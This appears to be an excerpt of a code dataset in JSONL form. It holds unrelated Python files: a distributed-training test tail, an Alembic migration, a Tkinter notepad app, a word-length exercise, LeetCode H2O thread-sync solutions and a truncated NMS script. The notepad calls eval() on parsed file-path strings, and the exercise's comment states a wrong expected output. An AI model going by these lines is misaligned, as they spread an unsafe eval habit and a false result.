zip(torch_model.named_parameters(), hybrid_model.parameters()):\n assert strict_shard_equal(pt.data, ph.data, tp_pg)\n\n\ndef run_dist(rank, world_size, port):\n colossalai.launch(config={}, rank=rank, world_size=world_size, port=port, host='localhost')\n exam_zero_with_tp()\n\n\n@pytest.mark.dist\n@rerun_if_address_is_in_use()\ndef test_zero_with_tp():\n world_size = 4\n run_func = partial(run_dist, world_size=world_size, port=free_port())\n mp.spawn(run_func, nprocs=world_size)\n\n\nif __name__ == '__main__':\n test_zero_with_tp()\n","repo_name":"Wenlinhan/ColossalAI","sub_path":"tests/test_zero/low_level_zero/test_zero_tp.py","file_name":"test_zero_tp.py","file_ext":"py","file_size_in_byte":3502,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"41008211700","text":"\"\"\"empty message\n\nRevision ID: 5d8bb7ea5b77\nRevises: 04690bb949a2\nCreate Date: 2020-01-26 18:14:09.493805\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '5d8bb7ea5b77'\ndown_revision = '04690bb949a2'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('projects',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('username', sa.String(length=80), nullable=False),\n sa.Column('email', sa.String(length=120), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('email'),\n sa.UniqueConstraint('username')\n )\n op.drop_index('email', table_name='person')\n op.drop_index('username', table_name='person')\n op.drop_table('person')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('person',\n sa.Column('id', mysql.INTEGER(display_width=11), autoincrement=True, nullable=False),\n sa.Column('username', mysql.VARCHAR(length=80), nullable=False),\n sa.Column('email', mysql.VARCHAR(length=120), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n mysql_default_charset='latin1',\n mysql_engine='InnoDB'\n )\n op.create_index('username', 'person', ['username'], unique=True)\n op.create_index('email', 'person', ['email'], unique=True)\n op.drop_table('projects')\n # ### end Alembic commands ###\n","repo_name":"jhcxavier/Back-End-PersPage","sub_path":"migrations/versions/5d8bb7ea5b77_.py","file_name":"5d8bb7ea5b77_.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"73723714666","text":"from tkinter import *\r\nfrom tkinter.messagebox import _show,askyesnocancel\r\nfrom tkinter import font,filedialog,ttk\r\nfrom os import system, startfile\r\nfrom sys import exit\r\nfrom sqlite3 import connect\r\n\r\nclass My_Note(Tk):\r\n # Variables\r\n issaved = False\r\n file_path = 'New Note'\r\n file_name = 'New Note'\r\n Bold = Italic = Underline = Wrap = Status = None\r\n\r\n # Initializing all class variables\r\n def __init__(self):\r\n super().__init__()\r\n\r\n # Checkbuttons\r\n self.Bold = IntVar(self)\r\n self.Italic = IntVar(self)\r\n self.Underline = IntVar(self)\r\n self.Wrap = IntVar(self,value=1)\r\n self.Status = StringVar(self,value='Ready')\r\n\r\n # For Font_Selection\r\n self.set_font_selector()\r\n\r\n # For Find, Replace\r\n self.startindex = '1.0'\r\n self.found=False\r\n self.exact=False\r\n self.nocase=True\r\n self.find_next_press = False\r\n\r\n # Setting Window height,width\r\n def window_set(self, width, height, minwidth, minheight):\r\n self.geometry(f'{width}x{height}')\r\n self.minsize(minwidth, minheight)\r\n self.iconbitmap('Mynote_img.ico')\r\n self.title_set()\r\n\r\n # Setting Window Title\r\n def title_set(self):\r\n if self.file_path == 'New Note':\r\n tag = ''\r\n elif self.issaved:\r\n tag = '(Saved)'\r\n else:\r\n tag = '(Not Saved)'\r\n self.title(f'MyNote - {self.file_path} {tag}')\r\n\r\n # Function for setting Scrollbar and Text Widget\r\n def Text_widget_and_scrollbar(self):\r\n self.pad = Text(self, font=self.main_font, wrap='word',undo=1,selectforeground='black',inactiveselectbackground='grey')\r\n scrolly = Scrollbar(self.pad,cursor='left_ptr')\r\n scrollx = Scrollbar(self.pad,orient=HORIZONTAL,cursor='left_ptr')\r\n self.pad.configure(yscrollcommand=scrolly.set,xscrollcommand=scrollx)\r\n\r\n scrolly.configure(command=self.pad.yview)\r\n scrollx.configure(command=self.pad.xview)\r\n\r\n scrolly.pack(side=RIGHT, fill=Y)\r\n scrollx.pack(side=BOTTOM, fill=X)\r\n self.pad.pack(fill=BOTH,expand=1)\r\n \r\n self.scrollers = (scrollx,scrolly)\r\n f1 = Frame(self,relief=RIDGE)\r\n f1.pack(side=BOTTOM,fill=X)\r\n\r\n status_widget = Label(f1,text=self.Status.get(), anchor='w')\r\n\r\n status_widget.pack(side=LEFT)\r\n\r\n line = Label(f1,text=f\"Line : {self.pad.index(INSERT).split('.')[0]} Char : {self.pad.index(INSERT).split('.')[1]}\",anchor='e')\r\n line.pack(side=RIGHT)\r\n return status_widget, line\r\n\r\n # Function for opening new a file\r\n def new_file(self):\r\n self.destroy()\r\n startfile('My_Note.py')\r\n\r\n # Function for saving a file\r\n def save_file(self):\r\n if not self.issaved and self.file_name=='New Note':\r\n name = filedialog.asksaveasfile(title='Save File', defaultext='.txt', initialdir='%HOMEDRIVE%%HOMEPATH%', filetypes=[\r\n ('Text Files', '*.txt'), ('All files', '*.*')])\r\n if not name == None:\r\n self.file_path = eval(str(name).split('=')[1].replace(' mode',''))\r\n self.issaved = True\r\n with open(self.file_path, 'w') as f:\r\n f.write(self.pad.get(1.0, END))\r\n \r\n self.file_name = self.file_path.split('/')[-1]\r\n # Saving data to database\r\n Db = Database(self.file_name)\r\n Db.clear()\r\n for i in self.get_format():\r\n Db.Insert_data(i[0],i[1],i[2])\r\n else:\r\n self.issaved=True\r\n with open(self.file_path, 'w') as f:\r\n f.write(self.pad.get(1.0, END))\r\n \r\n # Saving data to database\r\n Db = Database(self.file_name)\r\n Db.clear()\r\n for i in self.get_format():\r\n Db.Insert_data(i[0],i[1],i[2])\r\n\r\n self.title_set()\r\n\r\n # Function for Sava As \r\n def save_as_file(self):\r\n name = filedialog.asksaveasfile(title='Save As File', defaultext='.txt', initialdir='%HOMEDRIVE%%HOMEPATH%', filetypes=[\r\n ('Text Files', '*.txt'), ('All files', '*.*')])\r\n if not name == None:\r\n file_path = eval(str(name).split('=')[1].replace(' mode',''))\r\n file_name = file_path.split('/')[-1]\r\n with open(file_path, 'w') as f:\r\n f.write(self.pad.get(1.0, END))\r\n\r\n # Saving data to database\r\n Db = Database(file_name)\r\n Db.clear()\r\n for i in self.get_format():\r\n Db.Insert_data(i[0],i[1],i[2])\r\n\r\n # Function for opening a file\r\n def open_file(self):\r\n file = filedialog.askopenfile(\r\n title=\"Open File\", initialdir='%HOMEDRIVE%%HOMEPATH%', filetypes=[('Text Files', '*.txt'),('Python files','*.py'), ('All files', '*.*')])\r\n if not file == None:\r\n file_path = eval(str(file).split('=')[1].replace(' mode',''))\r\n file_name = file_path.split('/')[-1]\r\n with open(file_path) as f:\r\n My_Note_new = My_Note()\r\n My_Note_new.issaved = True\r\n My_Note_new.file_path = file_path\r\n My_Note_new.file_name = file_name\r\n\r\n def set_data():\r\n current_bold_font = My_Note_new.main_font.copy()\r\n current_bold_font.config(weight='bold')\r\n\r\n current_italic_font = My_Note_new.main_font.copy()\r\n current_italic_font.config(slant='italic')\r\n\r\n current_underline_font = My_Note_new.main_font.copy()\r\n current_underline_font.config(underline=1)\r\n\r\n current_overstrike_font = My_Note_new.main_font.copy()\r\n current_overstrike_font.config(overstrike=1)\r\n\r\n current_regular_font = My_Note_new.main_font.copy()\r\n\r\n Db = Database(file_name)\r\n for i in Db.Select_data():\r\n for j in ['bold','italic','underline','overstrike','regular']:\r\n if j!=i[2]:\r\n My_Note_new.pad.tag_remove(f'Format_{j}_text',i[0],i[1])\r\n else:\r\n My_Note_new.pad.tag_configure(f'Format_{i[2]}_text',font=eval(f'current_{i[2]}_font'))\r\n My_Note_new.pad.tag_add(f'Format_{i[2]}_text',i[0],i[1])\r\n \r\n main(My_Note_new, f.read(),set_data)\r\n \r\n def get_format(self):\r\n data_lst = []\r\n style = {'Format_bold_text':'bold','Format_italic_text':'italic','Format_underline_text':'underline','Format_overstrike_text':'overstrike'}\r\n for x in style:\r\n for i in range(0,len(self.pad.tag_ranges(x))-1,2):\r\n a = str(self.pad.tag_ranges(x)[i]).split('','')\r\n b = str(self.pad.tag_ranges(x)[i+1]).split('','')\r\n data_lst.append([a,b,style[x]])\r\n return data_lst\r\n\r\n # Important Function for opening a file\r\n def inserter(self, text=''):\r\n self.pad.insert(END, text)\r\n \r\n # For Shortcut for Bold,Italic,Underline\r\n def toggler(self,bold=False,underline=False,italic=False):\r\n if bold:\r\n if self.Bold.get() == 0:\r\n self.Bold.set(1)\r\n elif self.Bold.get() == 1:\r\n self.Bold.set(0)\r\n if italic:\r\n if self.Italic.get() == 0:\r\n self.Italic.set(1)\r\n elif self.Italic.get() == 1:\r\n self.Italic.set(0)\r\n if underline:\r\n if self.Underline.get() == 0:\r\n self.Underline.set(1)\r\n elif self.Underline.get() == 1:\r\n self.Underline.set(0)\r\n\r\n self.format()\r\n \r\n # For Font_Style Menu\r\n def format(self,font=False):\r\n\r\n bold = 'normal'\r\n underline = 0\r\n italic = 'roman'\r\n wrap_text = 'none'\r\n \r\n if not font:\r\n for i in [[self.Bold, 'bold'], [self.Italic, 'italic'], [self.Underline, 'underline'], [self.Wrap, 'word']]:\r\n if i[0].get() == 1:\r\n if i[1] == 'bold':\r\n bold = i[1]\r\n elif i[1] == 'italic':\r\n italic = i[1]\r\n elif i[1] == 'word':\r\n wrap_text = i[1]\r\n else:\r\n underline = 1\r\n self.pad_font.config(weight=bold, underline=underline, slant=italic)\r\n self.pad.configure(wrap=wrap_text)\r\n else:\r\n self.show_font()\r\n \r\n # To set regular_font\r\n def regular_setter(self):\r\n self.Bold.set(0)\r\n self.Italic.set(0)\r\n self.Underline.set(0)\r\n self.format()\r\n\r\n # For Font_Selection\r\n def set_font_selector(self):\r\n self.font_name = 'Times New Roman'\r\n self.font_size = 15\r\n\r\n self.pad_font = self.main_font = font.Font(self, family=self.font_name,size=self.font_size)\r\n self.fonts = list(map(str,font.families()))\r\n self.fonts.sort()\r\n\r\n # To change Font\r\n def selector(self,font_name,font_size):\r\n self.font_name = font_name.get()\r\n self.font_size = font_size.get()\r\n if self.font_name not in self.fonts:\r\n _show('Invalid format','Please select a valid Font name and size.')\r\n self.base.destroy()\r\n self.set_font_selector()\r\n self.format(font=True)\r\n return\r\n else:\r\n self.pad_font.configure(family=self.font_name,size=self.font_size)\r\n self.base.destroy()\r\n \r\n #To show font dialog\r\n def show_font(self):\r\n self.base = Tk()\r\n self.base.geometry('400x200')\r\n self.base.title('Select Font')\r\n self.base.iconbitmap('Mynote_img.ico')\r\n\r\n font_name = StringVar(self.base,value=self.font_name)\r\n font_size = StringVar(self.base,value=self.font_size)\r\n\r\n Label(self.base,text='Select Font',font=5).grid(padx=20)\r\n Lbx = ttk.Combobox(self.base,values=self.fonts,textvariable=font_name)\r\n Lbx.grid(padx=30)\r\n\r\n Label(self.base,text='Select Size',font=5).grid(column=1,row=0,pady=10)\r\n SizeBox = ttk.Combobox(self.base,values=[str(i+1) for i in range(99)],textvariable=font_size)\r\n SizeBox.grid(padx=20,column=1,row=1)\r\n\r\n Button(self.base,text='Apply',command=lambda : self.selector(font_name,font_size)).grid(columnspan=2,pady=70)\r\n\r\n self.base.mainloop()\r\n \r\n # Close app\r\n def onclose(self):\r\n if not self.issaved:\r\n if len(self.pad.get(1.0,END))<=1:\r\n self.destroy()\r\n else:\r\n ask = askyesnocancel('Warning','Do you want to save file ?')\r\n if ask==True:\r\n self.save_file()\r\n if self.issaved:\r\n self.destroy()\r\n elif ask==False:\r\n self.destroy()\r\n else:\r\n self.destroy()\r\n\r\n # Making shortcuts\r\n def configure_pad(self, status_widget):\r\n\r\n self.protocol('WM_DELETE_WINDOW',self.onclose)\r\n\r\n self.pad.bind('', func=lambda x: self.save_file())\r\n self.pad.bind('', func=lambda x: self.save_file())\r\n\r\n self.pad.bind('', func=lambda x: self.open_file())\r\n self.pad.bind('', func=lambda x: self.open_file())\r\n\r\n self.pad.bind('', func=lambda x: self.save_as_file())\r\n self.pad.bind('', func=lambda x: self.save_as_file())\r\n\r\n self.pad.bind('', func=lambda x: self.new_file())\r\n self.pad.bind('', func=lambda x: self.new_file())\r\n\r\n self.pad.bind('', func=lambda x: self.pad.edit_undo())\r\n self.pad.bind('', func=lambda x: self.pad.edit_undo())\r\n\r\n self.pad.bind('', func=lambda x: self.pad.edit_redo())\r\n self.pad.bind('', func=lambda x: self.pad.edit_redo())\r\n\r\n self.pad.bind('', func=lambda x: self.find_words('find'))\r\n self.pad.bind('', func=lambda x: self.find_words('find'))\r\n\r\n self.pad.bind('', func=lambda x: self.find_words('goto'))\r\n self.pad.bind('', func=lambda x: self.find_words('goto'))\r\n\r\n self.pad.bind('', func=lambda x: self.find_words('replace'))\r\n self.pad.bind('', func=lambda x: self.find_words('replace'))\r\n\r\n self.pad.bind('', func=lambda x: self.status_bar_setter(\r\n status_widget, 'Working.....'))\r\n self.pad.bind('', func=lambda x: self.status_bar_setter(\r\n status_widget, 'Ready'))\r\n\r\n self.pad.bind('', func=lambda x: self.status_bar_setter(\r\n status_widget, 'Working.....'))\r\n self.pad.bind('', func=lambda x: self.status_bar_setter(\r\n status_widget, 'Ready'))\r\n\r\n self.pad.bind(\r\n '', func=lambda x: self.toggler(bold=1))\r\n self.pad.bind(\r\n '', func=lambda x: self.toggler(bold=1))\r\n\r\n self.pad.bind(\r\n '', func=lambda x: self.toggler(italic=1))\r\n self.pad.bind(\r\n '', func=lambda x: self.toggler(italic=1))\r\n\r\n self.pad.bind(\r\n '', func=lambda x: self.toggler(underline=1))\r\n self.pad.bind(\r\n '', func=lambda x: self.toggler(underline=1))\r\n\r\n self.pad.bind('', func=lambda x: self.onclose())\r\n\r\n self.pad.bind('', func=lambda x: _show(\r\n 'About us', 'This My_Note is made by Suraj Kashyap.'))\r\n\r\n self.pad.bind(\r\n '', lambda x: self.Popup_Menu(x))\r\n\r\n self.pad.focus()\r\n \r\n # To Add style to particular region\r\n def set_style(self,bold=0,underline=0,italic=0,overstrike=0,regular=0):\r\n words = self.pad.selection_get()\r\n\r\n startindex = self.pad.search(words,INSERT)\r\n stopindex = f'{startindex.split(\".\")[0]}.{eval(startindex.split(\".\")[1])+len(words)}'\r\n\r\n if bold:\r\n self.current_bold_font = self.pad_font.copy()\r\n\r\n self.pad.tag_remove('Format_italic_text',startindex,stopindex)\r\n self.pad.tag_remove('Format_underline_text',startindex,stopindex)\r\n self.pad.tag_remove('Format_overstrike_text',startindex,stopindex)\r\n\r\n self.pad.tag_add('Format_bold_text',startindex,stopindex)\r\n self.current_bold_font.config(weight='bold')\r\n self.pad.tag_configure('Format_bold_text',font=self.current_bold_font)\r\n\r\n elif italic:\r\n self.pad.tag_remove('Format_bold_text',startindex,stopindex)\r\n self.pad.tag_remove('Format_underline_text',startindex,stopindex)\r\n self.pad.tag_remove('Format_overstrike_text',startindex,stopindex)\r\n\r\n self.current_italic_font = self.pad_font.copy()\r\n\r\n self.pad.tag_add('Format_italic_text',startindex,stopindex)\r\n self.current_italic_font.config(slant='italic')\r\n self.pad.tag_configure('Format_italic_text',font=self.current_italic_font)\r\n\r\n elif underline:\r\n self.pad.tag_remove('Format_bold_text',startindex,stopindex)\r\n self.pad.tag_remove('Format_italic_text',startindex,stopindex)\r\n self.pad.tag_remove('Format_overstrike_text',startindex,stopindex)\r\n \r\n self.current_underline_font = self.pad_font.copy()\r\n\r\n self.pad.tag_add('Format_underline_text',startindex,stopindex)\r\n self.current_underline_font.config(underline=1)\r\n self.pad.tag_configure('Format_underline_text',font=self.current_underline_font)\r\n \r\n elif overstrike:\r\n self.pad.tag_remove('Format_bold_text',startindex,stopindex)\r\n self.pad.tag_remove('Format_italic_text',startindex,stopindex)\r\n self.pad.tag_remove('Format_underline_text',startindex,stopindex)\r\n \r\n self.current_overstrike_font = self.pad_font.copy()\r\n\r\n self.pad.tag_add('Format_overstrike_text',startindex,stopindex)\r\n self.current_overstrike_font.config(overstrike=1)\r\n self.pad.tag_configure('Format_overstrike_text',font=self.current_overstrike_font)\r\n\r\n elif regular:\r\n self.pad.tag_remove('Format_bold_text',startindex,stopindex)\r\n self.pad.tag_remove('Format_italic_text',startindex,stopindex)\r\n self.pad.tag_remove('Format_underline_text',startindex,stopindex)\r\n self.pad.tag_remove('Format_overstrike_text',startindex,stopindex)\r\n\r\n # Changing status of bold, italic, underline and regular (Function for Popup Menu)\r\n def popmenu_setter(self):\r\n try:\r\n words = self.pad.selection_get()\r\n startindex = self.pad.search(words,INSERT)\r\n except Exception:\r\n self.bold_status = DISABLED\r\n self.italic_status = DISABLED\r\n self.underline_status = DISABLED\r\n self.overstrike_status = DISABLED\r\n self.regular_status = DISABLED\r\n\r\n else:\r\n if 'Format_bold_text' in self.pad.tag_names(startindex):\r\n self.bold_status = DISABLED\r\n else:\r\n self.bold_status = NORMAL\r\n\r\n if 'Format_italic_text' in self.pad.tag_names(startindex):\r\n self.italic_status = DISABLED\r\n else:\r\n self.italic_status = NORMAL\r\n\r\n if 'Format_underline_text' in self.pad.tag_names(startindex):\r\n self.underline_status = DISABLED\r\n else:\r\n self.underline_status = NORMAL\r\n \r\n if 'Format_overstrike_text' in self.pad.tag_names(startindex):\r\n self.overstrike_status = DISABLED\r\n else:\r\n self.overstrike_status = NORMAL\r\n \r\n if self.overstrike_status == NORMAL and self.underline_status == NORMAL and self.italic_status == NORMAL and self.bold_status == NORMAL:\r\n self.regular_status=DISABLED\r\n else:\r\n self.regular_status=NORMAL\r\n\r\n # For Right Click Menu \r\n def Popup_Menu(self, event):\r\n popmenu = Menu(self.pad, tearoff=0)\r\n self.popmenu_setter()\r\n\r\n popmenu.add_command(label='Regular',command=lambda : self.set_style(regular=1),state=self.regular_status)\r\n\r\n popmenu.add_command(label='Bold',command=lambda : self.set_style(bold=1),state=self.bold_status)\r\n\r\n popmenu.add_command(label='Italic',command=lambda : self.set_style(italic=1),state=self.italic_status)\r\n\r\n popmenu.add_command(label='Underline',command=lambda : self.set_style(underline=1),state=self.underline_status)\r\n\r\n popmenu.add_command(label='Overstrike',command=lambda : self.set_style(overstrike=1),state=self.overstrike_status)\r\n\r\n popmenu.add_separator()\r\n popmenu.add_command(label='Clear All', command=lambda : self.pad.delete(1.0, END))\r\n popmenu.add_command(label='Change_Font', command=lambda :self.format(font=True))\r\n popmenu.add_command(label='Close', command=self.onclose)\r\n popmenu.post(event.x_root, event.y_root)\r\n\r\n # For Find function\r\n def searcher(self,word):\r\n self.startindex = self.pad.search(word, self.startindex,END,exact=self.exact,nocase=self.nocase)\r\n if self.startindex:\r\n self.stopindex = f'{self.startindex.split(\".\")[0]}.{eval(self.startindex.split(\".\")[1])+len(word)}'\r\n self.pad.see(self.startindex)\r\n self.pad.tag_remove('sel',1.0,END)\r\n self.pad.tag_add('sel',self.startindex,self.stopindex)\r\n self.startindex=self.stopindex\r\n else:\r\n self.pad.bell()\r\n self.startindex=1.0\r\n\r\n # For Replace function\r\n def delete(self,new_text,old_text,all=False):\r\n def search():\r\n try:\r\n self.startindex = self.pad.search(old_text, self.startindex,END,exact=self.exact,nocase=self.nocase)\r\n if self.startindex:\r\n self.stopindex = f'{self.startindex.split(\".\")[0]}.{eval(self.startindex.split(\".\")[1])+len(old_text)}'\r\n self.pad.see(self.startindex)\r\n self.pad.tag_remove('sel',1.0,END)\r\n self.pad.tag_add('sel',self.startindex,self.stopindex)\r\n except Exception:\r\n self.pad.bell()\r\n self.startindex = 1.0\r\n self.stopindex = 1.0\r\n \r\n search()\r\n if self.find_next_press:\r\n if all:\r\n n=len(str(self.pad.get(1.0,END)).split(old_text))-1\r\n else:\r\n n=1\r\n for i in range(n):\r\n if 'sel' in self.pad.tag_names(self.startindex):\r\n self.pad.delete(self.startindex,self.stopindex)\r\n self.pad.insert(self.startindex,new_text)\r\n self.startindex = self.stopindex\r\n search()\r\n \r\n self.find_next_press = True\r\n\r\n # For Goto function\r\n def go(self,line):\r\n self.pad.see(line+'.0')\r\n self.pad.tag_remove('sel',1.0,END)\r\n self.pad.tag_add('sel',f'{line}.end')\r\n if eval(self.pad.index(END))-1>'))\r\n Edit_Menu.add_command(label='Copy Ctrl+C',\r\n command=lambda: self.pad.event_generate('<>'))\r\n Edit_Menu.add_command(label='Paste Ctrl+V',\r\n command=lambda: self.pad.event_generate('<>'))\r\n Edit_Menu.add_command(label='Select All Ctrl+A',\r\n command=lambda: self.pad.tag_add('sel',1.0,END))\r\n Edit_Menu.add_separator()\r\n\r\n Edit_Menu.add_command(label='Find Ctrl+F',command=self.find_words)\r\n Edit_Menu.add_command(label='Replace Ctrl+H',command=lambda :self.find_words('replace'))\r\n Edit_Menu.add_command(label='Go To Ctrl+G',command=lambda :self.find_words('goto'))\r\n\r\n\r\n Edit_Menu.add_separator()\r\n\r\n Edit_Menu.add_command(label='Close', command=self.destroy)\r\n return Edit_Menu\r\n\r\n # Font Menu\r\n def Font_style_setter(self):\r\n\r\n Font_style_Menu = Menu(self, tearoff=0)\r\n Font_style_Menu.add_command(\r\n label='Regular', command=self.regular_setter)\r\n Font_style_Menu.add_checkbutton(\r\n variable=self.Bold, label='Bold', command=self.format)\r\n Font_style_Menu.add_checkbutton(\r\n variable=self.Italic, label='Italic', command=self.format)\r\n Font_style_Menu.add_checkbutton(\r\n variable=self.Underline, label='Underline', command=self.format)\r\n Font_style_Menu.add_separator()\r\n Font_style_Menu.add_checkbutton(\r\n variable=self.Wrap, label='Wrap Text', command=self.format)\r\n Font_style_Menu.add_command(\r\n label='Format', command=lambda: self.format(True))\r\n\r\n return Font_style_Menu\r\n\r\n # Help Menu\r\n def Help_Menu_setter(self):\r\n Help_Menu = Menu(self, tearoff=0)\r\n Help_Menu.add_command(label='About One_Note F1', command=lambda: _show(\r\n 'About us', 'This MyNote is made by Suraj Kashyap.'))\r\n\r\n return Help_Menu\r\n\r\n # Update Status bar \r\n def status_bar_setter(self, status_widget, status):\r\n status_widget[0].configure(text=status)\r\n status_widget[1].configure(text=f\"Line : {self.pad.index(INSERT).split('.')[0]} Char : {self.pad.index(INSERT).split('.')[1]}\")\r\n self.issaved=False\r\n self.title_set()\r\n \r\n\r\nclass Database():\r\n def __init__(self,file_name):\r\n self.connection = connect(f'Data\\\\{file_name}.db')\r\n self.db = self.connection.cursor()\r\n try: \r\n self.db.execute(\"\"\"\r\n CREATE TABLE MASTER(\r\n Startindex text,\r\n Stopindex text,\r\n Format text\r\n )\r\n \"\"\")\r\n self.connection.commit()\r\n except Exception:\r\n pass\r\n\r\n def Insert_data(self,startindex,stopindex,format):\r\n with self.connection:\r\n self.db.execute('INSERT INTO MASTER VALUES((:start),(:stop),(:style))',{'start':startindex,'stop':stopindex,'style':format})\r\n\r\n def Select_data(self):\r\n with self.connection:\r\n self.db.execute('SELECT * FROM MASTER')\r\n return self.db.fetchall()\r\n \r\n def clear(self):\r\n with self.connection:\r\n self.db.execute('DELETE FROM MASTER')\r\n\r\n\r\n# Main Function\r\ndef main(MyNote, text='',func=print):\r\n MyNote.window_set(700, 500, 500, 300)\r\n status_widget = MyNote.Text_widget_and_scrollbar()\r\n MyNote.inserter(text)\r\n\r\n MyNote.configure_pad(status_widget)\r\n\r\n # Making Menubar\r\n mymenu = Menu(MyNote)\r\n File_Menu = MyNote.File_Menu_setter()\r\n mymenu.add_cascade(menu=File_Menu, label='File')\r\n\r\n Edit_Menu = MyNote.Edit_Menu_setter()\r\n mymenu.add_cascade(menu=Edit_Menu, label='Edit')\r\n\r\n Font_style_Menu = MyNote.Font_style_setter()\r\n mymenu.add_cascade(menu=Font_style_Menu, label='Font_style')\r\n\r\n Help_Menu = MyNote.Help_Menu_setter()\r\n mymenu.add_cascade(menu=Help_Menu, label='Help')\r\n\r\n MyNote.configure(menu=mymenu)\r\n func()\r\n # Running loop\r\n MyNote.mainloop()\r\n # exit()\r\n\r\n# Main\r\n\r\nsystem('mkdir .\\Data')\r\nMyNote = My_Note()\r\nmain(MyNote)\r\n\r\n","repo_name":"imsuraj675/MyNote","sub_path":"My_Note.py","file_name":"My_Note.py","file_ext":"py","file_size_in_byte":31346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17785715919","text":"# Crear una función que reciba un texto y devuelva una lista con las palabras que contienen entre 3 y 6 caracteres de largo\n\n\ndef palabras_entre_3_y_6_caracteres(texto):\n # Dividimos el texto en palabras\n palabras = texto.split()\n\n # Utilizamos una comprensión de lista para filtrar las palabras con 3 a 6 caracteres\n palabras_filtradas = [palabra for palabra in palabras if 3 <= len(palabra) <= 6]\n\n return palabras_filtradas\n\n\n# Ejemplo de uso:\ntexto = \"Esta es una frase de ejemplo con palabras cortas y largas\"\nresultado = palabras_entre_3_y_6_caracteres(texto)\nprint(resultado) # Debería devolver ['una', 'frase', 'con', 'y']\n","repo_name":"KevinPlucci/LABO-1-Python","sub_path":"GUIA/REGEX/eje9.py","file_name":"eje9.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"10741388709","text":"\"\"\"\n1117.H2O生成\n现在有两种线程,氧 oxygen 和氢 hydrogen,你的目标是组织这两种线程来产生水分子。\n\n存在一个屏障(barrier)使得每个线程必须等候直到一个完整水分子能够被产生出来。\n\n氢和氧线程会被分别给予 releaseHydrogen 和 releaseOxygen 方法来允许它们突破屏障。\n\n这些线程应该三三成组突破屏障并能立即组合产生一个水分子。\n\n你必须保证产生一个水分子所需线程的结合必须发生在下一个水分子产生之前。\n\n换句话说:\n如果一个氧线程到达屏障时没有氢线程到达,它必须等候直到两个氢线程到达。\n如果一个氢线程到达屏障时没有其它线程到达,它必须等候直到一个氧线程和另一个氢线程到达。\n书写满足这些限制条件的氢、氧线程同步代码。\n\n示例 1:\n输入: \"HOH\"\n输出: \"HHO\"\n解释: \"HOH\" 和 \"OHH\" 依然都是有效解。\n\n示例 2:\n输入: \"OOHHHH\"\n输出: \"HHOHHO\"\n解释: \"HOHHHO\", \"OHHHHO\", \"HHOHOH\", \"HOHHOH\", \"OHHHOH\", \"HHOOHH\", \"HOHOHH\" 和 \"OHHOHH\" 依然都是有效解。\n\n提示:\n输入字符串的总长将会是 3n, 1 ≤n≤ 50;\n输入字符串中的 “H” 总数将会是 2n 。\n输入字符串中的 “O” 总数将会是 n 。\n\"\"\"\nfrom typing import Callable\nfrom threading import Lock, Thread\nimport time\nimport threading\n\n\nclass H2O(object):\n def __init__(self):\n self.O = threading.Semaphore(1)\n self.H = threading.Semaphore(2)\n self.H_num = 0\n\n def hydrogen(self, releaseHydrogen):\n \"\"\"\n :type releaseHydrogen: method\n :rtype: void\n \"\"\"\n\n # releaseHydrogen() outputs \"H\". Do not change or remove this line.\n self.H.acquire()\n releaseHydrogen()\n\n self.H_num += 1\n if self.H_num > 1:\n self.H_num -= 2\n self.O.release()\n\n def oxygen(self, releaseOxygen):\n \"\"\"\n :type releaseOxygen: method\n :rtype: void\n \"\"\"\n\n # releaseOxygen() outputs \"O\". Do not change or remove this line.\n self.O.acquire()\n releaseOxygen()\n self.H.release()\n self.H.release()\n\n\nclass H2O1:\n def __init__(self):\n self.h = 0\n self.o = 0\n self.h2o_thread = Thread(target=self.h2o, args=())\n self.h2o_thread.setDaemon(True)\n self.h2o_thread.start()\n self.h_lock = Lock()\n self.o_lock = Lock()\n self.hl = Lock()\n self.ol = Lock()\n pass\n\n def h2o(self):\n while True:\n if self.h >= 2 and self.o >= 1:\n self.h -= 2\n self.o -= 1\n time.sleep(0.01)\n\n def hydrogen(self, releaseHydrogen: 'Callable[[], None]') -> None:\n self.h_lock.acquire()\n while self.h >= 2:\n time.sleep(0.01)\n # releaseHydrogen() outputs \"H\". Do not change or remove this line.\n releaseHydrogen()\n self.h += 1\n self.h_lock.release()\n\n def oxygen(self, releaseOxygen: 'Callable[[], None]') -> None:\n self.o_lock.acquire()\n while self.o >= 1:\n time.sleep(0.01)\n # releaseOxygen() outputs \"O\". Do not change or remove this line.\n releaseOxygen()\n self.o += 1\n self.o_lock.release()\n\n","repo_name":"GeorgeDaiz/my_python","sub_path":"Leetcode/Concurrency/1117.building-h2o.py","file_name":"1117.building-h2o.py","file_ext":"py","file_size_in_byte":3285,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9739232058","text":"import torch\nfrom torch import nn\nimport torch.utils.data\nimport torchvision\nimport numpy as np\nimport pickle,os\nfrom dataset import *\nfrom loss import *\nfrom network import *\nimport transforms\n# from torchvision import transforms\nimport cv2\n# from boxes import batched_nms\nfrom py_cpu_nms import py_cpu_nms\n\n_GRAY = (218, 227, 218)\n_GREEN = (18, 127, 15)\n_RED = (20, 50, 255)\n\nclasses=[\"__background__\",\"person\"]\n\ndef apply_nms(prediction,conf_thres=0.8,nms_thres=0.4,filter_labels=[],device=\"cpu\"):\n # for idx,prediction in enumerate(detections):\n # 1.先按scores过滤分数低的,过滤掉分数小于conf_thres\n ms = prediction[\"scores\"] > conf_thres\n if torch.sum(ms) == 0:\n return None\n else:\n last_scores = []\n last_labels = []\n last_boxes = []\n\n # 2.类别一样的按nms过滤,如果Iou大于nms_thres,保留分数最大的,否则都保留\n # 按阈值过滤\n scores = prediction[\"scores\"][ms]\n labels = prediction[\"labels\"][ms]\n boxes = 